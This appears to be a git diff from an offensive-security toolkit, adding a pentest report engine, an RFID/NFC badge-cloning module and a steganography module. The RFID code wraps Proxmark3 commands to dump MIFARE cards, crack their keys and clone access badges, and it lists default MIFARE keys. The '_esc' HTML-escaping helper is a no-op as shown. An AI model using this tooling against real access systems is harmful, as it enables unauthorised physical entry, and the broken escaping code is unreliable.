def _save_report(self, report: dict):
|
||||
path = os.path.join(self._data_dir, f'{report["id"]}.json')
|
||||
with open(path, 'w') as f:
|
||||
json.dump(report, f, indent=2)
|
||||
|
||||
|
||||
def _esc(s: str) -> str:
|
||||
return (s or '').replace('&', '&').replace('<', '<').replace('>', '>')
|
||||
|
||||
|
||||
# ── Singleton ─────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
_lock = threading.Lock()
|
||||
|
||||
|
||||
def get_report_engine() -> ReportEngine:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
with _lock:
|
||||
if _instance is None:
|
||||
_instance = ReportEngine()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI ───────────────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""Interactive CLI for Reporting Engine."""
|
||||
svc = get_report_engine()
|
||||
|
||||
while True:
|
||||
print("\n╔═══════════════════════════════════════╗")
|
||||
print("║ REPORTING ENGINE ║")
|
||||
print("╠═══════════════════════════════════════╣")
|
||||
print("║ 1 — List Reports ║")
|
||||
print("║ 2 — Create Report ║")
|
||||
print("║ 3 — Add Finding ║")
|
||||
print("║ 4 — Export Report ║")
|
||||
print("║ 5 — Finding Templates ║")
|
||||
print("║ 0 — Back ║")
|
||||
print("╚═══════════════════════════════════════╝")
|
||||
|
||||
choice = input("\n Select: ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
reports = svc.list_reports()
|
||||
if not reports:
|
||||
print("\n No reports.")
|
||||
continue
|
||||
for r in reports:
|
||||
print(f" [{r['id']}] {r['title']} — {r['findings_count']} findings "
|
||||
f"({r['status']}) {r['updated_at'][:10]}")
|
||||
elif choice == '2':
|
||||
title = input(" Report title: ").strip()
|
||||
client = input(" Client name: ").strip()
|
||||
scope = input(" Scope: ").strip()
|
||||
r = svc.create_report(title, client, scope)
|
||||
print(f" Created report: {r['report']['id']}")
|
||||
elif choice == '3':
|
||||
rid = input(" Report ID: ").strip()
|
||||
print(" Available templates:")
|
||||
for i, t in enumerate(FINDING_TEMPLATES, 1):
|
||||
print(f" {i}. [{t['severity'].upper()}] {t['title']}")
|
||||
sel = input(" Template # (0 for custom): ").strip()
|
||||
if sel and sel != '0':
|
||||
idx = int(sel) - 1
|
||||
if 0 <= idx < len(FINDING_TEMPLATES):
|
||||
f = FINDING_TEMPLATES[idx].copy()
|
||||
f.pop('id', None)
|
||||
r = svc.add_finding(rid, f)
|
||||
if r['ok']:
|
||||
print(f" Added: {f['title']}")
|
||||
else:
|
||||
title = input(" Title: ").strip()
|
||||
severity = input(" Severity (critical/high/medium/low/info): ").strip()
|
||||
desc = input(" Description: ").strip()
|
||||
r = svc.add_finding(rid, {'title': title, 'severity': severity,
|
||||
'description': desc})
|
||||
if r['ok']:
|
||||
print(f" Added finding: {r['finding']['id']}")
|
||||
elif choice == '4':
|
||||
rid = input(" Report ID: ").strip()
|
||||
fmt = input(" Format (html/markdown/json): ").strip() or 'html'
|
||||
if fmt == 'html':
|
||||
content = svc.export_html(rid)
|
||||
elif fmt == 'markdown':
|
||||
content = svc.export_markdown(rid)
|
||||
else:
|
||||
content = svc.export_json(rid)
|
||||
if content:
|
||||
ext = {'html': 'html', 'markdown': 'md', 'json': 'json'}.get(fmt, 'txt')
|
||||
outpath = os.path.join(svc._data_dir, f'{rid}.{ext}')
|
||||
with open(outpath, 'w') as f:
|
||||
f.write(content)
|
||||
print(f" Exported to: {outpath}")
|
||||
else:
|
||||
print(" Report not found.")
|
||||
elif choice == '5':
|
||||
for t in FINDING_TEMPLATES:
|
||||
print(f" [{t['severity'].upper():8s}] {t['title']} (CVSS {t['cvss']})")
|
||||
455
modules/rfid_tools.py
Normal file
455
modules/rfid_tools.py
Normal file
@ -0,0 +1,455 @@
|
||||
"""AUTARCH RFID/NFC Tools
|
||||
|
||||
Proxmark3 integration, badge cloning, NFC read/write, MIFARE operations,
|
||||
and card analysis for physical access security testing.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "RFID/NFC badge cloning & analysis"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "analyze"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import shutil
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, List, Optional, Any
|
||||
|
||||
try:
|
||||
from core.paths import find_tool, get_data_dir
|
||||
except ImportError:
|
||||
def find_tool(name):
|
||||
return shutil.which(name)
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
|
||||
# ── Card Types ───────────────────────────────────────────────────────────────
|
||||
|
||||
CARD_TYPES = {
|
||||
'em410x': {'name': 'EM410x', 'frequency': '125 kHz', 'category': 'LF'},
|
||||
'hid_prox': {'name': 'HID ProxCard', 'frequency': '125 kHz', 'category': 'LF'},
|
||||
't5577': {'name': 'T5577', 'frequency': '125 kHz', 'category': 'LF', 'writable': True},
|
||||
'mifare_classic_1k': {'name': 'MIFARE Classic 1K', 'frequency': '13.56 MHz', 'category': 'HF'},
|
||||
'mifare_classic_4k': {'name': 'MIFARE Classic 4K', 'frequency': '13.56 MHz', 'category': 'HF'},
|
||||
'mifare_ultralight': {'name': 'MIFARE Ultralight', 'frequency': '13.56 MHz', 'category': 'HF'},
|
||||
'mifare_desfire': {'name': 'MIFARE DESFire', 'frequency': '13.56 MHz', 'category': 'HF'},
|
||||
'ntag213': {'name': 'NTAG213', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True},
|
||||
'ntag215': {'name': 'NTAG215', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True},
|
||||
'ntag216': {'name': 'NTAG216', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True},
|
||||
'iclass': {'name': 'iCLASS', 'frequency': '13.56 MHz', 'category': 'HF'},
|
||||
'iso14443a': {'name': 'ISO 14443A', 'frequency': '13.56 MHz', 'category': 'HF'},
|
||||
'iso15693': {'name': 'ISO 15693', 'frequency': '13.56 MHz', 'category': 'HF'},
|
||||
'legic': {'name': 'LEGIC', 'frequency': '13.56 MHz', 'category': 'HF'},
|
||||
}
|
||||
|
||||
MIFARE_DEFAULT_KEYS = [
|
||||
'FFFFFFFFFFFF', 'A0A1A2A3A4A5', 'D3F7D3F7D3F7',
|
||||
'000000000000', 'B0B1B2B3B4B5', '4D3A99C351DD',
|
||||
'1A982C7E459A', 'AABBCCDDEEFF', '714C5C886E97',
|
||||
'587EE5F9350F', 'A0478CC39091', '533CB6C723F6',
|
||||
]
|
||||
|
||||
|
||||
# ── RFID Manager ─────────────────────────────────────────────────────────────
|
||||
|
||||
class RFIDManager:
|
||||
"""RFID/NFC tool management via Proxmark3 and nfc-tools."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'rfid')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.dumps_dir = os.path.join(self.data_dir, 'dumps')
|
||||
os.makedirs(self.dumps_dir, exist_ok=True)
|
||||
|
||||
# Tool discovery
|
||||
self.pm3_client = find_tool('pm3') or find_tool('proxmark3') or shutil.which('pm3') or shutil.which('proxmark3')
|
||||
self.nfc_list = shutil.which('nfc-list')
|
||||
self.nfc_poll = shutil.which('nfc-poll')
|
||||
self.nfc_mfclassic = shutil.which('nfc-mfclassic')
|
||||
|
||||
self.cards: List[Dict] = []
|
||||
self.last_read: Optional[Dict] = None
|
||||
|
||||
def get_tools_status(self) -> Dict:
|
||||
"""Check available tools."""
|
||||
return {
|
||||
'proxmark3': self.pm3_client is not None,
|
||||
'nfc-list': self.nfc_list is not None,
|
||||
'nfc-mfclassic': self.nfc_mfclassic is not None,
|
||||
'card_types': len(CARD_TYPES),
|
||||
'saved_cards': len(self.cards)
|
||||
}
|
||||
|
||||
# ── Proxmark3 Commands ───────────────────────────────────────────────
|
||||
|
||||
def _pm3_cmd(self, command: str, timeout: int = 15) -> Dict:
|
||||
"""Execute Proxmark3 command."""
|
||||
if not self.pm3_client:
|
||||
return {'ok': False, 'error': 'Proxmark3 client not found'}
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[self.pm3_client, '-c', command],
|
||||
capture_output=True, text=True, timeout=timeout
|
||||
)
|
||||
return {
|
||||
'ok': result.returncode == 0,
|
||||
'stdout': result.stdout,
|
||||
'stderr': result.stderr
|
||||
}
|
||||
except subprocess.TimeoutExpired:
|
||||
return {'ok': False, 'error': f'Command timed out: {command}'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# ── Low Frequency (125 kHz) ──────────────────────────────────────────
|
||||
|
||||
def lf_search(self) -> Dict:
|
||||
"""Search for LF (125 kHz) cards."""
|
||||
result = self._pm3_cmd('lf search')
|
||||
if not result['ok']:
|
||||
return result
|
||||
|
||||
output = result['stdout']
|
||||
card = {'frequency': '125 kHz', 'category': 'LF'}
|
||||
|
||||
# Parse EM410x
|
||||
em_match = re.search(r'EM\s*410x.*?ID[:\s]*([A-Fa-f0-9]+)', output, re.I)
|
||||
if em_match:
|
||||
card['type'] = 'em410x'
|
||||
card['id'] = em_match.group(1)
|
||||
card['name'] = 'EM410x'
|
||||
|
||||
# Parse HID
|
||||
hid_match = re.search(r'HID.*?Card.*?([A-Fa-f0-9]+)', output, re.I)
|
||||
if hid_match:
|
||||
card['type'] = 'hid_prox'
|
||||
card['id'] = hid_match.group(1)
|
||||
card['name'] = 'HID ProxCard'
|
||||
|
||||
if 'id' in card:
|
||||
card['raw_output'] = output
|
||||
self.last_read = card
|
||||
return {'ok': True, 'card': card}
|
||||
|
||||
return {'ok': False, 'error': 'No LF card found', 'raw': output}
|
||||
|
||||
def lf_read_em410x(self) -> Dict:
|
||||
"""Read EM410x card."""
|
||||
result = self._pm3_cmd('lf em 410x reader')
|
||||
if not result['ok']:
|
||||
return result
|
||||
|
||||
match = re.search(r'EM\s*410x\s+ID[:\s]*([A-Fa-f0-9]+)', result['stdout'], re.I)
|
||||
if match:
|
||||
card = {
|
||||
'type': 'em410x', 'id': match.group(1),
|
||||
'name': 'EM410x', 'frequency': '125 kHz'
|
||||
}
|
||||
self.last_read = card
|
||||
return {'ok': True, 'card': card}
|
||||
return {'ok': False, 'error': 'Could not read EM410x', 'raw': result['stdout']}
|
||||
|
||||
def lf_clone_em410x(self, card_id: str) -> Dict:
|
||||
"""Clone EM410x ID to T5577 card."""
|
||||
result = self._pm3_cmd(f'lf em 410x clone --id {card_id}')
|
||||
return {
|
||||
'ok': 'written' in result.get('stdout', '').lower() or result['ok'],
|
||||
'message': f'Cloned EM410x ID {card_id}' if result['ok'] else result.get('error', ''),
|
||||
'raw': result.get('stdout', '')
|
||||
}
|
||||
|
||||
def lf_sim_em410x(self, card_id: str) -> Dict:
|
||||
"""Simulate EM410x card."""
|
||||
result = self._pm3_cmd(f'lf em 410x sim --id {card_id}', timeout=30)
|
||||
return {
|
||||
'ok': result['ok'],
|
||||
'message': f'Simulating EM410x ID {card_id}',
|
||||
'raw': result.get('stdout', '')
|
||||
}
|
||||
|
||||
# ── High Frequency (13.56 MHz) ───────────────────────────────────────
|
||||
|
||||
def hf_search(self) -> Dict:
|
||||
"""Search for HF (13.56 MHz) cards."""
|
||||
result = self._pm3_cmd('hf search')
|
||||
if not result['ok']:
|
||||
return result
|
||||
|
||||
output = result['stdout']
|
||||
card = {'frequency': '13.56 MHz', 'category': 'HF'}
|
||||
|
||||
# Parse UID
|
||||
uid_match = re.search(r'UID[:\s]*([A-Fa-f0-9\s]+)', output, re.I)
|
||||
if uid_match:
|
||||
card['uid'] = uid_match.group(1).replace(' ', '').strip()
|
||||
|
||||
# Parse ATQA/SAK
|
||||
atqa_match = re.search(r'ATQA[:\s]*([A-Fa-f0-9\s]+)', output, re.I)
|
||||
if atqa_match:
|
||||
card['atqa'] = atqa_match.group(1).strip()
|
||||
sak_match = re.search(r'SAK[:\s]*([A-Fa-f0-9]+)', output, re.I)
|
||||
if sak_match:
|
||||
card['sak'] = sak_match.group(1).strip()
|
||||
|
||||
# Detect type
|
||||
if 'mifare classic 1k' in output.lower():
|
||||
card['type'] = 'mifare_classic_1k'
|
||||
card['name'] = 'MIFARE Classic 1K'
|
||||
elif 'mifare classic 4k' in output.lower():
|
||||
card['type'] = 'mifare_classic_4k'
|
||||
card['name'] = 'MIFARE Classic 4K'
|
||||
elif 'ultralight' in output.lower() or 'ntag' in output.lower():
|
||||
card['type'] = 'mifare_ultralight'
|
||||
card['name'] = 'MIFARE Ultralight/NTAG'
|
||||
elif 'desfire' in output.lower():
|
||||
card['type'] = 'mifare_desfire'
|
||||
card['name'] = 'MIFARE DESFire'
|
||||
elif 'iso14443' in output.lower():
|
||||
card['type'] = 'iso14443a'
|
||||
card['name'] = 'ISO 14443A'
|
||||
|
||||
if 'uid' in card:
|
||||
card['raw_output'] = output
|
||||
self.last_read = card
|
||||
return {'ok': True, 'card': card}
|
||||
|
||||
return {'ok': False, 'error': 'No HF card found', 'raw': output}
|
||||
|
||||
def hf_dump_mifare(self, keys_file: str = None) -> Dict:
|
||||
"""Dump MIFARE Classic card data."""
|
||||
cmd = 'hf mf autopwn'
|
||||
if keys_file:
|
||||
cmd += f' -f {keys_file}'
|
||||
|
||||
result = self._pm3_cmd(cmd, timeout=120)
|
||||
if not result['ok']:
|
||||
return result
|
||||
|
||||
output = result['stdout']
|
||||
|
||||
# Look for dump file
|
||||
dump_match = re.search(r'saved.*?(\S+\.bin)', output, re.I)
|
||||
if dump_match:
|
||||
dump_file = dump_match.group(1)
|
||||
# Copy to our dumps directory
|
||||
dest = os.path.join(self.dumps_dir, Path(dump_file).name)
|
||||
if os.path.exists(dump_file):
|
||||
shutil.copy2(dump_file, dest)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'dump_file': dest,
|
||||
'message': 'MIFARE dump complete',
|
||||
'raw': output
|
||||
}
|
||||
|
||||
# Check for found keys
|
||||
keys = re.findall(r'key\s*[AB][:\s]*([A-Fa-f0-9]{12})', output, re.I)
|
||||
if keys:
|
||||
return {
|
||||
'ok': True,
|
||||
'keys_found': list(set(keys)),
|
||||
'message': f'Found {len(set(keys))} keys',
|
||||
'raw': output
|
||||
}
|
||||
|
||||
return {'ok': False, 'error': 'Dump failed', 'raw': output}
|
||||
|
||||
def hf_clone_mifare(self, dump_file: str) -> Dict:
|
||||
"""Write MIFARE dump to blank card."""
|
||||
result = self._pm3_cmd(f'hf mf restore -f {dump_file}', timeout=60)
|
||||
return {
|
||||
'ok': 'restored' in result.get('stdout', '').lower() or result['ok'],
|
||||
'message': 'Card cloned' if result['ok'] else 'Clone failed',
|
||||
'raw': result.get('stdout', '')
|
||||
}
|
||||
|
||||
# ── NFC Operations (via libnfc) ──────────────────────────────────────
|
||||
|
||||
def nfc_scan(self) -> Dict:
|
||||
"""Scan for NFC tags using libnfc."""
|
||||
if not self.nfc_list:
|
||||
return {'ok': False, 'error': 'nfc-list not found (install libnfc)'}
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[self.nfc_list], capture_output=True, text=True, timeout=10
|
||||
)
|
||||
tags = []
|
||||
for line in result.stdout.splitlines():
|
||||
uid_match = re.search(r'UID.*?:\s*([A-Fa-f0-9\s:]+)', line, re.I)
|
||||
if uid_match:
|
||||
tags.append({
|
||||
'uid': uid_match.group(1).replace(' ', '').replace(':', ''),
|
||||
'raw': line.strip()
|
||||
})
|
||||
return {'ok': True, 'tags': tags, 'count': len(tags)}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# ── Card Database ────────────────────────────────────────────────────
|
||||
|
||||
def save_card(self, card: Dict, name: str = None) -> Dict:
|
||||
"""Save card data to database."""
|
||||
card['saved_at'] = datetime.now(timezone.utc).isoformat()
|
||||
card['display_name'] = name or card.get('name', 'Unknown Card')
|
||||
# Remove raw output to save space
|
||||
card.pop('raw_output', None)
|
||||
self.cards.append(card)
|
||||
self._save_cards()
|
||||
return {'ok': True, 'count': len(self.cards)}
|
||||
|
||||
def get_saved_cards(self) -> List[Dict]:
|
||||
"""List saved cards."""
|
||||
return self.cards
|
||||
|
||||
def delete_card(self, index: int) -> Dict:
|
||||
"""Delete saved card by index."""
|
||||
if 0 <= index < len(self.cards):
|
||||
self.cards.pop(index)
|
||||
self._save_cards()
|
||||
return {'ok': True}
|
||||
return {'ok': False, 'error': 'Invalid index'}
|
||||
|
||||
def _save_cards(self):
|
||||
cards_file = os.path.join(self.data_dir, 'cards.json')
|
||||
with open(cards_file, 'w') as f:
|
||||
json.dump(self.cards, f, indent=2)
|
||||
|
||||
def _load_cards(self):
|
||||
cards_file = os.path.join(self.data_dir, 'cards.json')
|
||||
if os.path.exists(cards_file):
|
||||
try:
|
||||
with open(cards_file) as f:
|
||||
self.cards = json.load(f)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def list_dumps(self) -> List[Dict]:
|
||||
"""List saved card dumps."""
|
||||
dumps = []
|
||||
for f in Path(self.dumps_dir).iterdir():
|
||||
if f.is_file():
|
||||
dumps.append({
|
||||
'name': f.name, 'path': str(f),
|
||||
'size': f.stat().st_size,
|
||||
'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat()
|
||||
})
|
||||
return dumps
|
||||
|
||||
def get_default_keys(self) -> List[str]:
|
||||
"""Return common MIFARE default keys."""
|
||||
return MIFARE_DEFAULT_KEYS
|
||||
|
||||
def get_card_types(self) -> Dict:
|
||||
"""Return supported card type info."""
|
||||
return CARD_TYPES
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_rfid_manager() -> RFIDManager:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = RFIDManager()
|
||||
_instance._load_cards()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for RFID/NFC module."""
|
||||
mgr = get_rfid_manager()
|
||||
|
||||
while True:
|
||||
tools = mgr.get_tools_status()
|
||||
print(f"\n{'='*60}")
|
||||
print(f" RFID / NFC Tools")
|
||||
print(f"{'='*60}")
|
||||
print(f" Proxmark3: {'OK' if tools['proxmark3'] else 'NOT FOUND'}")
|
||||
print(f" libnfc: {'OK' if tools['nfc-list'] else 'NOT FOUND'}")
|
||||
print(f" Saved cards: {tools['saved_cards']}")
|
||||
print()
|
||||
print(" 1 — LF Search (125 kHz)")
|
||||
print(" 2 — HF Search (13.56 MHz)")
|
||||
print(" 3 — Read EM410x")
|
||||
print(" 4 — Clone EM410x to T5577")
|
||||
print(" 5 — Dump MIFARE Classic")
|
||||
print(" 6 — Clone MIFARE from Dump")
|
||||
print(" 7 — NFC Scan (libnfc)")
|
||||
print(" 8 — Saved Cards")
|
||||
print(" 9 — Card Dumps")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
result = mgr.lf_search()
|
||||
if result['ok']:
|
||||
c = result['card']
|
||||
print(f" Found: {c.get('name', '?')} ID: {c.get('id', '?')}")
|
||||
else:
|
||||
print(f" {result.get('error', 'No card found')}")
|
||||
elif choice == '2':
|
||||
result = mgr.hf_search()
|
||||
if result['ok']:
|
||||
c = result['card']
|
||||
print(f" Found: {c.get('name', '?')} UID: {c.get('uid', '?')}")
|
||||
else:
|
||||
print(f" {result.get('error', 'No card found')}")
|
||||
elif choice == '3':
|
||||
result = mgr.lf_read_em410x()
|
||||
if result['ok']:
|
||||
print(f" EM410x ID: {result['card']['id']}")
|
||||
save = input(" Save card? (y/n): ").strip()
|
||||
if save.lower() == 'y':
|
||||
mgr.save_card(result['card'])
|
||||
else:
|
||||
print(f" {result['error']}")
|
||||
elif choice == '4':
|
||||
card_id = input(" EM410x ID to clone: ").strip()
|
||||
if card_id:
|
||||
result = mgr.lf_clone_em410x(card_id)
|
||||
print(f" {result.get('message', result.get('error'))}")
|
||||
elif choice == '5':
|
||||
result = mgr.hf_dump_mifare()
|
||||
if result['ok']:
|
||||
print(f" {result['message']}")
|
||||
if 'keys_found' in result:
|
||||
for k in result['keys_found']:
|
||||
print(f" Key: {k}")
|
||||
else:
|
||||
print(f" {result['error']}")
|
||||
elif choice == '6':
|
||||
dump = input(" Dump file path: ").strip()
|
||||
if dump:
|
||||
result = mgr.hf_clone_mifare(dump)
|
||||
print(f" {result['message']}")
|
||||
elif choice == '7':
|
||||
result = mgr.nfc_scan()
|
||||
if result['ok']:
|
||||
print(f" Found {result['count']} tags:")
|
||||
for t in result['tags']:
|
||||
print(f" UID: {t['uid']}")
|
||||
else:
|
||||
print(f" {result['error']}")
|
||||
elif choice == '8':
|
||||
cards = mgr.get_saved_cards()
|
||||
for i, c in enumerate(cards):
|
||||
print(f" [{i}] {c.get('display_name', '?')} "
|
||||
f"{c.get('type', '?')} ID={c.get('id', c.get('uid', '?'))}")
|
||||
elif choice == '9':
|
||||
for d in mgr.list_dumps():
|
||||
print(f" {d['name']} ({d['size']} bytes)")
|
||||
769
modules/steganography.py
Normal file
769
modules/steganography.py
Normal file
@ -0,0 +1,769 @@
|
||||
"""AUTARCH Steganography
|
||||
|
||||
Image/audio/document steganography — hide data in carrier files using LSB
|
||||
encoding, DCT domain embedding, and whitespace encoding. Includes detection
|
||||
via statistical analysis and optional AES-256 encryption.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Steganography — hide & extract data in files"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "counter"
|
||||
|
||||
import os
|
||||
import io
|
||||
import re
|
||||
import json
|
||||
import struct
|
||||
import hashlib
|
||||
import secrets
|
||||
from pathlib import Path
|
||||
from typing import Dict, List, Optional, Tuple
|
||||
|
||||
try:
|
||||
from core.paths import get_data_dir
|
||||
except ImportError:
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
# Optional imports
|
||||
try:
|
||||
from PIL import Image
|
||||
HAS_PIL = True
|
||||
except ImportError:
|
||||
HAS_PIL = False
|
||||
|
||||
try:
|
||||
from Crypto.Cipher import AES
|
||||
from Crypto.Util.Padding import pad, unpad
|
||||
HAS_CRYPTO = True
|
||||
except ImportError:
|
||||
try:
|
||||
from Cryptodome.Cipher import AES
|
||||
from Cryptodome.Util.Padding import pad, unpad
|
||||
HAS_CRYPTO = True
|
||||
except ImportError:
|
||||
HAS_CRYPTO = False
|
||||
|
||||
try:
|
||||
import wave
|
||||
HAS_WAVE = True
|
||||
except ImportError:
|
||||
HAS_WAVE = False
|
||||
|
||||
|
||||
# ── Encryption Layer ─────────────────────────────────────────────────────────
|
||||
|
||||
def _derive_key(password: str) -> bytes:
|
||||
"""Derive 256-bit key from password."""
|
||||
return hashlib.sha256(password.encode()).digest()
|
||||
|
||||
def _encrypt_data(data: bytes, password: str) -> bytes:
|
||||
"""AES-256-CBC encrypt data."""
|
||||
if not HAS_CRYPTO:
|
||||
return data
|
||||
key = _derive_key(password)
|
||||
iv = secrets.token_bytes(16)
|
||||
cipher = AES.new(key, AES.MODE_CBC, iv)
|
||||
ct = cipher.encrypt(pad(data, AES.block_size))
|
||||
return iv + ct
|
||||
|
||||
def _decrypt_data(data: bytes, password: str) -> bytes:
|
||||
"""AES-256-CBC decrypt data."""
|
||||
if not HAS_CRYPTO:
|
||||
return data
|
||||
key = _derive_key(password)
|
||||
iv = data[:16]
|
||||
ct = data[16:]
|
||||
cipher = AES.new(key, AES.MODE_CBC, iv)
|
||||
return unpad(cipher.decrypt(ct), AES.block_size)
|
||||
|
||||
|
||||
# ── LSB Image Steganography ──────────────────────────────────────────────────
|
||||
|
||||
class ImageStego:
|
||||
"""LSB steganography for PNG/BMP images."""
|
||||
|
||||
MAGIC = b'ASTS' # AUTARCH Stego Signature
|
||||
|
||||
@staticmethod
|
||||
def capacity(image_path: str) -> Dict:
|
||||
"""Calculate maximum payload capacity in bytes."""
|
||||
if not HAS_PIL:
|
||||
return {'ok': False, 'error': 'Pillow (PIL) not installed'}
|
||||
try:
|
||||
img = Image.open(image_path)
|
||||
w, h = img.size
|
||||
channels = len(img.getbands())
|
||||
# 1 bit per channel per pixel, minus header
|
||||
total_bits = w * h * channels
|
||||
total_bytes = total_bits // 8 - 8 # subtract header (magic + length)
|
||||
return {
|
||||
'ok': True, 'capacity_bytes': max(0, total_bytes),
|
||||
'width': w, 'height': h, 'channels': channels,
|
||||
'format': img.format
|
||||
}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def hide(image_path: str, data: bytes, output_path: str,
|
||||
password: str = None, bits_per_channel: int = 1) -> Dict:
|
||||
"""Hide data in image using LSB encoding."""
|
||||
if not HAS_PIL:
|
||||
return {'ok': False, 'error': 'Pillow (PIL) not installed'}
|
||||
|
||||
try:
|
||||
img = Image.open(image_path).convert('RGB')
|
||||
pixels = list(img.getdata())
|
||||
w, h = img.size
|
||||
|
||||
# Encrypt if password provided
|
||||
payload = data
|
||||
if password:
|
||||
payload = _encrypt_data(data, password)
|
||||
|
||||
# Build header: magic(4) + length(4) + payload
|
||||
header = ImageStego.MAGIC + struct.pack('>I', len(payload))
|
||||
full_data = header + payload
|
||||
|
||||
# Convert to bits
|
||||
bits = []
|
||||
for byte in full_data:
|
||||
for i in range(7, -1, -1):
|
||||
bits.append((byte >> i) & 1)
|
||||
|
||||
# Check capacity
|
||||
max_bits = len(pixels) * 3 * bits_per_channel
|
||||
if len(bits) > max_bits:
|
||||
return {'ok': False, 'error': f'Data too large ({len(full_data)} bytes). '
|
||||
f'Max capacity: {max_bits // 8} bytes'}
|
||||
|
||||
# Encode bits into LSB
|
||||
bit_idx = 0
|
||||
new_pixels = []
|
||||
mask = ~((1 << bits_per_channel) - 1) & 0xFF
|
||||
|
||||
for pixel in pixels:
|
||||
new_pixel = []
|
||||
for channel_val in pixel:
|
||||
if bit_idx < len(bits):
|
||||
# Clear LSBs and set new value
|
||||
new_val = (channel_val & mask) | bits[bit_idx]
|
||||
new_pixel.append(new_val)
|
||||
bit_idx += 1
|
||||
else:
|
||||
new_pixel.append(channel_val)
|
||||
new_pixels.append(tuple(new_pixel))
|
||||
|
||||
# Save
|
||||
stego_img = Image.new('RGB', (w, h))
|
||||
stego_img.putdata(new_pixels)
|
||||
stego_img.save(output_path, 'PNG')
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'output': output_path,
|
||||
'hidden_bytes': len(payload),
|
||||
'encrypted': password is not None,
|
||||
'message': f'Hidden {len(payload)} bytes in {output_path}'
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def extract(image_path: str, password: str = None,
|
||||
bits_per_channel: int = 1) -> Dict:
|
||||
"""Extract hidden data from image."""
|
||||
if not HAS_PIL:
|
||||
return {'ok': False, 'error': 'Pillow (PIL) not installed'}
|
||||
|
||||
try:
|
||||
img = Image.open(image_path).convert('RGB')
|
||||
pixels = list(img.getdata())
|
||||
|
||||
# Extract all LSBs
|
||||
bits = []
|
||||
for pixel in pixels:
|
||||
for channel_val in pixel:
|
||||
bits.append(channel_val & 1)
|
||||
|
||||
# Convert bits to bytes
|
||||
all_bytes = bytearray()
|
||||
for i in range(0, len(bits) - 7, 8):
|
||||
byte = 0
|
||||
for j in range(8):
|
||||
byte = (byte << 1) | bits[i + j]
|
||||
all_bytes.append(byte)
|
||||
|
||||
# Check magic
|
||||
if all_bytes[:4] != ImageStego.MAGIC:
|
||||
return {'ok': False, 'error': 'No hidden data found (magic mismatch)'}
|
||||
|
||||
# Read length
|
||||
payload_len = struct.unpack('>I', bytes(all_bytes[4:8]))[0]
|
||||
if payload_len > len(all_bytes) - 8:
|
||||
return {'ok': False, 'error': 'Corrupted data (length exceeds image capacity)'}
|
||||
|
||||
payload = bytes(all_bytes[8:8 + payload_len])
|
||||
|
||||
# Decrypt if password provided
|
||||
if password:
|
||||
try:
|
||||
payload = _decrypt_data(payload, password)
|
||||
except Exception:
|
||||
return {'ok': False, 'error': 'Decryption failed (wrong password?)'}
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'data': payload,
|
||||
'size': len(payload),
|
||||
'encrypted': password is not None,
|
||||
'message': f'Extracted {len(payload)} bytes'
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
|
||||
# ── Audio Steganography ──────────────────────────────────────────────────────
|
||||
|
||||
class AudioStego:
|
||||
"""LSB steganography for WAV audio files."""
|
||||
|
||||
MAGIC = b'ASTS'
|
||||
|
||||
@staticmethod
|
||||
def capacity(audio_path: str) -> Dict:
|
||||
"""Calculate maximum payload capacity."""
|
||||
if not HAS_WAVE:
|
||||
return {'ok': False, 'error': 'wave module not available'}
|
||||
try:
|
||||
with wave.open(audio_path, 'rb') as w:
|
||||
frames = w.getnframes()
|
||||
channels = w.getnchannels()
|
||||
sample_width = w.getsampwidth()
|
||||
total_bytes = (frames * channels) // 8 - 8
|
||||
return {
|
||||
'ok': True, 'capacity_bytes': max(0, total_bytes),
|
||||
'frames': frames, 'channels': channels,
|
||||
'sample_width': sample_width,
|
||||
'framerate': w.getframerate()
|
||||
}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def hide(audio_path: str, data: bytes, output_path: str,
|
||||
password: str = None) -> Dict:
|
||||
